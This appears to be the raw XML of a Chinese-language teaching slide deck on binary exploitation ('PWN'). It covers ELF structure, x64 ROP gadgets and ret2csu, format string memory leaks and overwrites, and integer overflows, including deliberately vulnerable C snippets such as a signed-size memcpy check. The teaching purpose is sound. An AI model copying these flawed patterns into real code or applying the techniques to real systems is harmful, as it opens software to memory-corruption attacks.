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5.jpg" ContentType="image/png"/>
  <Override PartName="/ppt/media/image6.jpg" ContentType="image/png"/>
  <Override PartName="/ppt/media/image7.jpg" ContentType="image/png"/>
  <Override PartName="/ppt/media/image8.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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="380" r:id="rId4"/>
    <p:sldId id="381" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="321" r:id="rId9"/>
    <p:sldId id="323" r:id="rId10"/>
    <p:sldId id="343" r:id="rId11"/>
    <p:sldId id="322" r:id="rId12"/>
    <p:sldId id="326" r:id="rId13"/>
    <p:sldId id="341" r:id="rId14"/>
    <p:sldId id="384" r:id="rId15"/>
    <p:sldId id="325" r:id="rId16"/>
    <p:sldId id="342" r:id="rId17"/>
    <p:sldId id="324" r:id="rId18"/>
    <p:sldId id="345" r:id="rId19"/>
    <p:sldId id="383" r:id="rId20"/>
    <p:sldId id="267" r:id="rId21"/>
    <p:sldId id="327" r:id="rId22"/>
    <p:sldId id="295" r:id="rId23"/>
    <p:sldId id="296" r:id="rId24"/>
    <p:sldId id="268" r:id="rId25"/>
    <p:sldId id="317" r:id="rId26"/>
    <p:sldId id="318" r:id="rId27"/>
    <p:sldId id="328" r:id="rId28"/>
    <p:sldId id="269" r:id="rId29"/>
    <p:sldId id="261" r:id="rId30"/>
    <p:sldId id="351" r:id="rId31"/>
    <p:sldId id="329" r:id="rId32"/>
    <p:sldId id="352" r:id="rId33"/>
    <p:sldId id="353" r:id="rId34"/>
    <p:sldId id="354" r:id="rId35"/>
    <p:sldId id="355" r:id="rId36"/>
    <p:sldId id="356" r:id="rId37"/>
    <p:sldId id="357" r:id="rId38"/>
    <p:sldId id="358"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344" r:id="rId55"/>
    <p:sldId id="346" r:id="rId56"/>
    <p:sldId id="347" r:id="rId57"/>
    <p:sldId id="359" r:id="rId58"/>
    <p:sldId id="373" r:id="rId59"/>
    <p:sldId id="360" r:id="rId60"/>
    <p:sldId id="263" r:id="rId61"/>
    <p:sldId id="320" r:id="rId62"/>
    <p:sldId id="375" r:id="rId63"/>
    <p:sldId id="376" r:id="rId64"/>
    <p:sldId id="377" r:id="rId65"/>
    <p:sldId id="393" r:id="rId66"/>
    <p:sldId id="394" r:id="rId67"/>
    <p:sldId id="395" r:id="rId68"/>
    <p:sldId id="396" r:id="rId69"/>
    <p:sldId id="386" r:id="rId70"/>
    <p:sldId id="305" r:id="rId71"/>
    <p:sldId id="385" r:id="rId72"/>
    <p:sldId id="330" r:id="rId73"/>
    <p:sldId id="331" r:id="rId74"/>
    <p:sldId id="332" r:id="rId75"/>
    <p:sldId id="333" r:id="rId76"/>
    <p:sldId id="334" r:id="rId77"/>
    <p:sldId id="335" r:id="rId78"/>
    <p:sldId id="336" r:id="rId79"/>
    <p:sldId id="337" r:id="rId80"/>
    <p:sldId id="338" r:id="rId81"/>
    <p:sldId id="339" r:id="rId82"/>
    <p:sldId id="340" r:id="rId83"/>
    <p:sldId id="433" r:id="rId84"/>
    <p:sldId id="374" r:id="rId85"/>
    <p:sldId id="388" r:id="rId86"/>
    <p:sldId id="389" r:id="rId87"/>
    <p:sldId id="390" r:id="rId88"/>
    <p:sldId id="391" r:id="rId89"/>
    <p:sldId id="392" r:id="rId90"/>
    <p:sldId id="372" r:id="rId91"/>
    <p:sldId id="382" r:id="rId92"/>
    <p:sldId id="425" r:id="rId93"/>
    <p:sldId id="426" r:id="rId94"/>
    <p:sldId id="427" r:id="rId95"/>
    <p:sldId id="428" r:id="rId96"/>
    <p:sldId id="429" r:id="rId97"/>
    <p:sldId id="378" r:id="rId98"/>
    <p:sldId id="430" r:id="rId99"/>
    <p:sldId id="431" r:id="rId100"/>
    <p:sldId id="432" r:id="rId101"/>
    <p:sldId id="405" r:id="rId102"/>
    <p:sldId id="406" r:id="rId103"/>
    <p:sldId id="262" r:id="rId104"/>
    <p:sldId id="407" r:id="rId105"/>
    <p:sldId id="408" r:id="rId106"/>
    <p:sldId id="409" r:id="rId107"/>
    <p:sldId id="410" r:id="rId108"/>
    <p:sldId id="411" r:id="rId109"/>
    <p:sldId id="412" r:id="rId110"/>
    <p:sldId id="413" r:id="rId111"/>
    <p:sldId id="414" r:id="rId112"/>
    <p:sldId id="415" r:id="rId113"/>
    <p:sldId id="416" r:id="rId114"/>
    <p:sldId id="417" r:id="rId115"/>
    <p:sldId id="418" r:id="rId116"/>
    <p:sldId id="419" r:id="rId117"/>
    <p:sldId id="420" r:id="rId118"/>
    <p:sldId id="421" r:id="rId119"/>
    <p:sldId id="422" r:id="rId120"/>
    <p:sldId id="423" r:id="rId121"/>
    <p:sldId id="424" r:id="rId122"/>
    <p:sldId id="387" r:id="rId123"/>
    <p:sldId id="264" r:id="rId124"/>
    <p:sldId id="434" r:id="rId125"/>
    <p:sldId id="436" r:id="rId126"/>
    <p:sldId id="438" r:id="rId127"/>
    <p:sldId id="439" r:id="rId128"/>
    <p:sldId id="440" r:id="rId129"/>
    <p:sldId id="441" r:id="rId130"/>
    <p:sldId id="442" r:id="rId131"/>
    <p:sldId id="463" r:id="rId132"/>
    <p:sldId id="443" r:id="rId133"/>
    <p:sldId id="444" r:id="rId134"/>
    <p:sldId id="450" r:id="rId135"/>
    <p:sldId id="462" r:id="rId136"/>
    <p:sldId id="464" r:id="rId137"/>
    <p:sldId id="445" r:id="rId138"/>
    <p:sldId id="465" r:id="rId139"/>
    <p:sldId id="466" r:id="rId140"/>
    <p:sldId id="467" r:id="rId141"/>
    <p:sldId id="468" r:id="rId142"/>
    <p:sldId id="469" r:id="rId143"/>
    <p:sldId id="470" r:id="rId144"/>
    <p:sldId id="471" r:id="rId145"/>
    <p:sldId id="472" r:id="rId146"/>
    <p:sldId id="473" r:id="rId147"/>
    <p:sldId id="446" r:id="rId148"/>
    <p:sldId id="447" r:id="rId149"/>
    <p:sldId id="449" r:id="rId150"/>
    <p:sldId id="451" r:id="rId151"/>
    <p:sldId id="452" r:id="rId152"/>
    <p:sldId id="453" r:id="rId153"/>
    <p:sldId id="454" r:id="rId154"/>
    <p:sldId id="455" r:id="rId155"/>
    <p:sldId id="456" r:id="rId156"/>
    <p:sldId id="457" r:id="rId157"/>
    <p:sldId id="474" r:id="rId158"/>
    <p:sldId id="460" r:id="rId159"/>
    <p:sldId id="461" r:id="rId160"/>
    <p:sldId id="348" r:id="rId161"/>
    <p:sldId id="350" r:id="rId162"/>
    <p:sldId id="367" r:id="rId163"/>
    <p:sldId id="368" r:id="rId164"/>
    <p:sldId id="379" r:id="rId165"/>
    <p:sldId id="369" r:id="rId166"/>
    <p:sldId id="370" r:id="rId167"/>
    <p:sldId id="349" r:id="rId168"/>
    <p:sldId id="361" r:id="rId169"/>
    <p:sldId id="362" r:id="rId170"/>
    <p:sldId id="363" r:id="rId171"/>
    <p:sldId id="364" r:id="rId172"/>
    <p:sldId id="365" r:id="rId173"/>
    <p:sldId id="366" r:id="rId1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C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DFDB"/>
    <a:srgbClr val="C5CAE9"/>
    <a:srgbClr val="9FA8DA"/>
    <a:srgbClr val="F0F4C3"/>
    <a:srgbClr val="C8E6C9"/>
    <a:srgbClr val="FFE0B2"/>
    <a:srgbClr val="FFCC80"/>
    <a:srgbClr val="FFECB3"/>
    <a:srgbClr val="C0F2DF"/>
    <a:srgbClr val="BEF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6" d="100"/>
          <a:sy n="86" d="100"/>
        </p:scale>
        <p:origin x="82"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247AF-5B5C-4147-BFFB-F12477DB49FD}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2020/7/20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F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189192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20107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786452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41943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9288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60455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31634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964770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01440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766730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077347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2039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01373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53628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402736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27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Shape 1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7" name="Shape 1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Shape 16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1" name="Shape 16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Shape 1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6" name="Shape 16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Shape 16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2" name="Shape 16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818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091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9" name="Shape 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Shape 9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8" name="Shape 9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6" name="Shape 9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Shape 9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5" name="Shape 9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4" name="Shape 9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39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9" name="Shape 9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Shape 9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4" name="Shape 9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10749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Shape 1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3" name="Shape 14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1" name="Shape 14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Shape 1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2" name="Shape 1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Shape 1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3" name="Shape 1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6" name="Shape 1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Shape 17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7" name="Shape 17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867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6121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Shape 1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0" name="Shape 1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Shape 17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8" name="Shape 17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Shape 1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8" name="Shape 17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Shape 1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8" name="Shape 17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Shape 17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8" name="Shape 17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Shape 18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8" name="Shape 18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Shape 1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9" name="Shape 1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Shape 19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0" name="Shape 19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Shape 19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5" name="Shape 19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95885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Shape 2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1" name="Shape 20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Shape 2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1" name="Shape 20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Shape 2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8" name="Shape 2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Shape 20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6" name="Shape 20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Shape 20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2" name="Shape 20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Shape 2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8" name="Shape 20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Shape 20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4" name="Shape 20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Shape 20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0" name="Shape 20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Shape 20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6" name="Shape 20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04716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Shape 20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2" name="Shape 20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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2094" name="Shape 20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5" name="Shape 20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Shape 2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2" name="Shape 2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Shape 2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8" name="Shape 2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Shape 2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4" name="Shape 2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Shape 2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0" name="Shape 2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6" name="Shape 2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Shape 2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2" name="Shape 2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Shape 2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9" name="Shape 2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884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27408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806559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67263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049626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24105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86640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27832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088991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88400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078167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349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0815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457117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87335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674188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173387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179172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39540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372276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192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845579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310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0B5286-7DC6-4515-8C85-93EFF4C090F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10889"/>
            <a:ext cx="12192000" cy="400108"/>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971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blank">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71802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29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244729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29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1532207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320449342"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="dk2" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483689" r:id="rId1"/>
    <p:sldLayoutId id="2147483678" r:id="rId2"/>
    <p:sldLayoutId id="2147483688" r:id="rId3"/>
    <p:sldLayoutId id="2147483690" r:id="rId4"/>
    <p:sldLayoutId id="2147483650" r:id="rId5"/>
    <p:sldLayoutId id="214748370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hellman/libformatstr" TargetMode="External"/><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hyperlink" Target="http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf" TargetMode="Externa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992F9D-07E8-4BC5-9060-9AD44D5160EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1859340"/>
            <a:ext cx="3331361" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PWN</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6A31576-E6B3-4285-B55D-F84E2EC6EFEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846406" y="3611879"/>
            <a:ext cx="4801314" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>二进制漏洞挖掘与利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="直接连接符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3280A9BA-BCD6-4321-9A3E-FB1EC931F899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792000" y="3425483"/>
            <a:ext cx="10800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99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1D6494D-206D-40FB-A712-9D891EE9484B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700511" y="1720840"/>
            <a:ext cx="4916731" cy="3416320"/>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文件头表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF header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文件的组织结构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程序头表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段表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Program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告诉系统如何创建进程</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生成进程的可执行文件必须拥有此结构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重定位文件不一定需要</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节头表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Section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文件的节区信息</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用于链接的目标文件必须拥有此结构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其它类型目标文件不一定需要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38F7642-EE9E-4AD4-8769-C8C8F75C1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64368"/>
            <a:ext cx="5395489" cy="5978785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{154273AA-FF7C-421C-9120-340161B7F49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51670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Shape 19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923" name="Shape 1923"/>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924" name="Shape 1924"/>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925" name="Shape 1925"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1923" idx="1"/>
            <a:endCxn id="1924"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926" name="Shape 1926"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="199908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927" name="Shape 1927"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="220388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928" name="Shape 1928"/>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929" name="Shape 1929"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1928" idx="0"/>
            <a:endCxn id="1924"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930" name="Shape 1930"/>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931" name="Shape 1931"/>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32" name="Shape 1932"/>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33" name="Shape 1933"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1924" idx="0"/>
            <a:endCxn id="1931"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34" name="Shape 1934"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1932" idx="1"/>
            <a:endCxn id="1931"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35" name="Shape 1935"/>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6" name="Shape 1936"/>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37" name="Shape 1937"/>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38" name="Shape 1938"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1931" idx="0"/>
            <a:endCxn id="1939"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40" name="Shape 1940"/>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39" name="Shape 1939"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="1777533"/>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ROP payload 2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1941" name="Shape 1941"/>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42" name="Shape 1942"/>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43" name="Shape 1943"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1942" idx="1"/>
            <a:endCxn id="1939"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44" name="Shape 1944"/>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45" name="Shape 1945"/>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46" name="Shape 1946"/>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47" name="Shape 1947"/>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48" name="Shape 1948"/>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D59593DB-F687-4C77-883A-7DC7C626172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Shape 19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x64 ROP</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1998" name="Shape 1998"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1547813"/>
            <a:ext cx="11360150" cy="4556125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>gadget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传递参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> ; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop rsi ; pop r15 ; ret  ;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setting rdx and rcx is hard, no trivial gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret2csu</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B78832B0-F74D-44EE-A795-5F95B7A1C82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__libc_csu_init Gadgets for x64</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2004" name="Shape 2004"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="590533" y="1922933"/>
            <a:ext cx="11142867" cy="4317867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2005" name="Shape 2005"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895461" y="2155945"/>
            <a:ext cx="3687200" cy="935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6" name="Shape 2006"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895461" y="4448177"/>
            <a:ext cx="3687200" cy="156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矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65B043C4-0960-46F3-90DB-2D5B9A9AF05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D03D8DB-F1DE-4D53-AC7F-FE07611372DD}"/>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9357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4</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格式化字符串漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{780F7D27-A0AC-4D7E-8CEE-E2AA96811627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2611582" y="2885899"/>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泄露任意地址内存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篡改任意地址内存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21456861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Shape 202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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2024" name="Shape 2024"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>European Space Agency spacecraft Cluster I's satellites exploded because of integer overflow (1996)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M. Dowd, C. Spencer, N. Metha, N. Herath, and H. Flake. Advanced Software Vulnerability Assessment. In Blackhat USA, August 2002</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IO2BO</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Array index out of bounds</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2025" name="Shape 2025"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="818433" y="4370667"/>
            <a:ext cx="5237200" cy="20236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safe_memcpy(char *src, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int size</a:t>
            </a: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char dst[512];</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 &lt; 512)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memcpy(dst, src,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6" name="Shape 2026"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6558200" y="4375267"/>
            <a:ext cx="4806000" cy="20144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safe_set_element(char *arr, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
